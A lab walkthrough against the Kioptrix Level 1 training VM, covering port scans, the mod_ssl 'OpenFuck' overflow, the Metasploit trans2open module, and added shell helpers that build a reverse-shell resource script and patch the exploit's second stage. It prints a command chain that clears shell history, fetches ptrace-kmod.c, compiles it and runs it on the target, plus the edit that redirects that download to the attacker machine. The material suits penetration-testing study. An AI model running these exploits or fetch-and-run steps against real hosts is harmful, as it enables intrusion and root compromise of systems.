The Kioptrix series VMs ship with the network adapter in bridged mode. If Kali is on NAT it cannot see the target, and switching the adapter through VMware's VM settings does not stick.

Fix: after downloading the VM, do not import it into VMware yet (if it is already imported, remove it from the library first). Edit the .vmx configuration file in the VM directory and delete every line that starts with ethernet0, then import the VM, add a new network adapter and set it to NAT. Kali can then scan the target.
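As an added example (not part of the original post), a small POSIX shell helper that does the .vmx edit described above. It assumes the VM is closed and not registered in VMware while it runs, and that the path you pass is the VM's .vmx file; it keeps a .bak copy and prints how many ethernet0 lines remain (expected 0), after which you add the NAT adapter in the VMware UI as the post describes.

```shell
#!/bin/sh
# Added example, not from the original post: strip the stale ethernet0.*
# entries from a Kioptrix .vmx so that a fresh NAT adapter can be added.
# Assumption: the VM is not open or registered in VMware while this runs.

fix_kioptrix_vmx() {
    vmx="$1"
    [ -f "$vmx" ] || { echo "no such file: $vmx" >&2; return 1; }
    # Keep an untouched copy to roll back if the import misbehaves.
    cp -- "$vmx" "$vmx.bak"
    # Every setting of the first NIC is keyed ethernet0.<something>;
    # drop them all, leaving the rest of the config intact.
    sed '/^ethernet0\./d' "$vmx.bak" > "$vmx"
    # Report how many ethernet0 lines survived (should be 0).
    grep -c '^ethernet0\.' "$vmx" || true
}

# Usage: fix_kioptrix_vmx /path/to/Kioptrix/Kioptrix.vmx
```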

Kali IP: 192.168.1.128

Target IP: 192.168.1.130

sudo nmap --min-rate 10000 -p- 192.168.1.130
Starting Nmap 7.92 ( https://nmap.org ) at 2023-08-17 10:27 CST
Nmap scan report for 192.168.1.130
Host is up (0.0023s latency).
Not shown: 65529 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
443/tcp open https
1024/tcp open kdm
sudo nmap -sT -sV -O -p22,80,111,139,443,1024 192.168.1.130
Starting Nmap 7.92 ( https://nmap.org ) at 2023-08-17 10:40 CST
Nmap scan report for 192.168.1.130
Host is up (0.00036s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd (workgroup: yMYGROUP)
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
1024/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:7C:3A:16 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop

mod_ssl, OpenSSL, rpcbind and Samba are all worth a look.

A search for rpcbind turns up only denial-of-service issues, so it is parked.

sudo nmap -sU -p22,80,111,139,443,1024 192.168.1.130
Starting Nmap 7.92 ( https://nmap.org ) at 2023-08-17 10:42 CST
Nmap scan report for 192.168.1.130
Host is up (0.00025s latency).
PORT STATE SERVICE
22/udp closed ssh
80/udp closed http
111/udp open rpcbind
139/udp closed netbios-ssn
443/udp closed https
1024/udp closed unknown

The UDP scan is only there to make sure nothing was missed: just rpcbind on 111/udp shows up, consistent with the TCP results.

Browsing to port 80 and port 443 shows the same site on both, matching the services nmap identified.

Directory brute force:

sudo dirb http://192.168.1.130
-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Fri Aug 18 10:18:03 2023
URL_BASE: http://192.168.1.130/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.1.130/ ----
+ http://192.168.1.130/~operator (CODE:403|SIZE:273)
+ http://192.168.1.130/~root (CODE:403|SIZE:269)
+ http://192.168.1.130/cgi-bin/ (CODE:403|SIZE:272)
+ http://192.168.1.130/index.html (CODE:200|SIZE:2890)
==> DIRECTORY: http://192.168.1.130/manual/
==> DIRECTORY: http://192.168.1.130/mrtg/
==> DIRECTORY: http://192.168.1.130/usage/

---- Entering directory: http://192.168.1.130/manual/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.130/mrtg/ ----
+ http://192.168.1.130/mrtg/index.html (CODE:200|SIZE:17318)

---- Entering directory: http://192.168.1.130/usage/ ----
+ http://192.168.1.130/usage/index.html (CODE:200|SIZE:4261)

This is the default Red Hat Apache page and its bundled documentation; nothing exploitable here.

Next, check what is known for Apache 1.3.20:

searchsploit apache 1.3.20

searchsploit lists a remote overflow in mod_ssl below 2.8.7; the target runs mod_ssl 2.8.4, so it applies. Pull the exploit:

searchsploit -m 47080.c
Exploit: Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2)
URL: https://www.exploit-db.com/exploits/47080
Path: /usr/share/exploitdb/exploits/unix/remote/47080.c
File Type: C source, ASCII text
gcc -o exploit 47080.c -lcrypto
47080.c:21:10: fatal error: openssl/ssl.h: No such file or directory
21 | #include <openssl/ssl.h>
| ^~~~~~~~~~~~~~~
compilation terminated.

The OpenSSL development headers are missing; install them (the libssl-dev package on Kali) and recompile.

The exploit's target table has two entries that match this box (Red Hat 7.2, apache-1.3.20-16): 0x6a and 0x6b. Try both; the one whose offsets match spawns a shell, the other just prints "Good Bye!".

sudo ./exploit 0x6a 192.168.1.130 -c 50

*******************************************************************
* OpenFuck v3.0.4-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena irc.brasnet.org *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************
Connection... 50 of 50
Establishing SSL connection
cipher: 0x4043808c ciphers: 0x80f8068
Ready to send shellcode
Spawning shell...
Good Bye!
sudo ./exploit 0x6b 192.168.1.130 -c 50

*******************************************************************
* OpenFuck v3.0.4-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena irc.brasnet.org *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************
Connection... 50 of 50
Establishing SSL connection
cipher: 0x4043808c ciphers: 0x80f8068
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$
unset HISTFILE; cd /tmp; wget https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c; gcc -o exploit ptrace-kmod.c -B /usr/bin; rm ptrace-kmod.c; ./exploit;
--23:19:52-- https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
=> `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:443...
dl.packetstormsecurity.net: Host not found.
gcc: ptrace-kmod.c: No such file or directory
gcc: No input files
rm: cannot remove `ptrace-kmod.c': No such file or directory
bash: ./exploit: No such file or directory
bash-2.05$

Check who we are:

uname -a
Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown
whoami;id
apache
uid=48(apache) gid=48(apache) groups=48(apache)

The shell landed, but the privilege escalation never ran. The exploit's second stage (COMMAND2 in the source) makes the target wget ptrace-kmod.c, a local root exploit for 2.4 kernels, from dl.packetstormsecurity.net, compile it and run it. The target cannot resolve that host ("Host not found"), so gcc has nothing to build and we are left as the apache user.

Samba next. Of the Metasploit Samba modules, only the last one (trans2open) attacks port 139; the others default to port 445, which is not open on this target, and they cover much later Samba versions anyway.

use exploit/linux/samba/

Matching Modules
================

   #  Name                                    Disclosure Date  Rank       Check  Description
   -  ----                                    ---------------  ----       -----  -----------
   0  exploit/linux/samba/setinfopolicy_heap  2012-04-10       normal     Yes    Samba SetInformationPolicy AuditEventsInfo Heap Overflow
   1  exploit/linux/samba/chain_reply         2010-06-16       good       No     Samba chain_reply Memory Corruption (Linux x86)
   2  exploit/linux/samba/is_known_pipename   2017-03-24       excellent  Yes    Samba is_known_pipename() Arbitrary Module Load
   3  exploit/linux/samba/lsa_transnames_heap 2007-05-14       good       Yes    Samba lsa_io_trans_names Heap Overflow
   4  exploit/linux/samba/trans2open          2003-04-07       great      No     Samba trans2open Overflow (Linux x86)

smbd normally runs as root, so a working Samba exploit hands over a root shell directly.

samba/setinfopolicy_heap: heap overflow in SetInformationPolicy AuditEventsInfo handling.

samba/chain_reply: memory corruption in Samba before 3.3.13. The memory allocated for the reply packet is corrupted by supplying a value larger than the target buffer.

samba/is_known_pipename: CVE-2017-7494, every version from Samba 3.5.0 up to 4.6.4/4.5.10/4.4.14. Samba lets a client open a remote named pipe and calls is_known_pipename() to validate the name before connecting. That function does not reject certain special characters in the pipe name, and Samba then loads a shared library using that name, so an attacker who can place a malicious shared object on a writable share gets arbitrary code execution.

samba/lsa_transnames_heap: heap overflow in lsa_io_trans_names.

samba/trans2open: a buffer overflow present in Samba 2.2.0 through 2.2.8; the module works on x86 Linux targets whose stack is executable (no noexec stack).

With trans2open configured (RHOSTS, LHOST), run gives a root shell straight away.
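As an added example (not the post's own commands), a shell helper that writes a Metasploit resource script for the trans2open run described above. The RHOSTS/LHOST values assume the post's addresses (target 192.168.1.130, Kali 192.168.1.128). The payload line is my own addition from experience with this box, not something the post states: the module's default meterpreter payload tends to die on this 2.4 kernel, while a plain reverse shell stays up.

```shell
#!/bin/sh
# Added example, not from the original post: generate a msfconsole resource
# script for exploit/linux/samba/trans2open against Kioptrix Level 1.
# Assumption (from my own runs, not the post): the default meterpreter payload
# dies on this old 2.4 kernel, so a plain linux/x86/shell_reverse_tcp is set.

write_trans2open_rc() {
    out="$1"      # resource script to write
    rhost="$2"    # target, e.g. 192.168.1.130
    lhost="$3"    # Kali address the shell connects back to, e.g. 192.168.1.128
    cat > "$out" <<EOF
use exploit/linux/samba/trans2open
set RHOSTS $rhost
set RPORT 139
set payload linux/x86/shell_reverse_tcp
set LHOST $lhost
exploit
EOF
    # Return the number of "set" lines so a caller can sanity-check the file.
    grep -c '^set ' "$out"
}

# Usage:
#   write_trans2open_rc trans2open.rc 192.168.1.130 192.168.1.128
#   msfconsole -q -r trans2open.rc
```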

Back to the mod_ssl route, following the approach found online: Kali (192.168.1.128) can reach the Internet, so download the file the exploit wants the target to fetch, change the wget URL in the exploit so that 192.168.1.130 fetches it from a temporary HTTP server on 192.168.1.128 port 80, and run the exploit again to get root.

nl 47080.c|grep ptrace
     8	 * Note: if required, host ptrace and replace wget target
   308	#define COMMAND2 "unset HISTFILE; cd /tmp; wget https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c; gcc -o exploit ptrace-kmod.c -B /usr/bin; rm ptrace-kmod.c; ./exploit; \n"
wget https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
--2023-08-18 09:29:59-- https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
Resolving dl.packetstormsecurity.net (dl.packetstormsecurity.net)... 198.84.60.200
Connecting to dl.packetstormsecurity.net (dl.packetstormsecurity.net)|198.84.60.200|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3921 (3.8K) [text/x-csrc]
Saving to: 'ptrace-kmod.c'

ptrace-kmod.c 100%[================================================================>] 3.83K --.-KB/s in 0s

2023-08-18 09:30:01 (131 MB/s) - 'ptrace-kmod.c' saved [3921/3921]

Edit line 308 of 47080.c so the wget target is http://192.168.1.128/ptrace-kmod.c, recompile, start a temporary HTTP server on 192.168.1.128 port 80 in the directory holding ptrace-kmod.c, and run the exploit at the same time:

python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.1.130 - - [18/Aug/2023 09:37:16] "GET /ptrace-kmod.c HTTP/1.0" 200 -
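To make the edit concrete, here is an added helper (not the post's or exploit-db's code) that rewrites the wget URL inside COMMAND2 in 47080.c so the target fetches ptrace-kmod.c from Kali. It assumes 47080.c and the downloaded ptrace-kmod.c sit in the current directory on Kali, that 192.168.1.128 is Kali and reachable from the target on port 80, and that python3's http.server is run from that same directory. The post stops at the GET request; the flow expects the second stage to compile ptrace-kmod.c on the target and return a root shell.

```shell
#!/bin/sh
# Added example, not from the original post: point OpenFuck's second-stage
# wget (the COMMAND2 #define in 47080.c) at a web server we control instead
# of dl.packetstormsecurity.net, which the target cannot resolve.
# Assumptions: 47080.c is in the current directory, ptrace-kmod.c has already
# been downloaded next to it, and the target can reach Kali on port 80.

patch_openfuck_wget() {
    src="$1"      # path to 47080.c
    host="$2"     # Kali address the target will fetch from, e.g. 192.168.1.128
    tmpf=$(mktemp)
    # Only the URL changes; gcc -B /usr/bin, rm and ./exploit stay as they are.
    # '#' is used as the sed delimiter because the URL contains '/'.
    sed "s#https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c#http://$host/ptrace-kmod.c#" \
        "$src" > "$tmpf" && mv "$tmpf" "$src"
    # Show the patched line so the new URL can be eyeballed before compiling.
    grep -n 'define COMMAND2' "$src"
}

# Usage on Kali (the server and the exploit go in separate terminals):
#   patch_openfuck_wget 47080.c 192.168.1.128
#   gcc -o exploit 47080.c -lcrypto
#   sudo python3 -m http.server 80      # serves ptrace-kmod.c from this directory
#   sudo ./exploit 0x6b 192.168.1.130 -c 50
```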
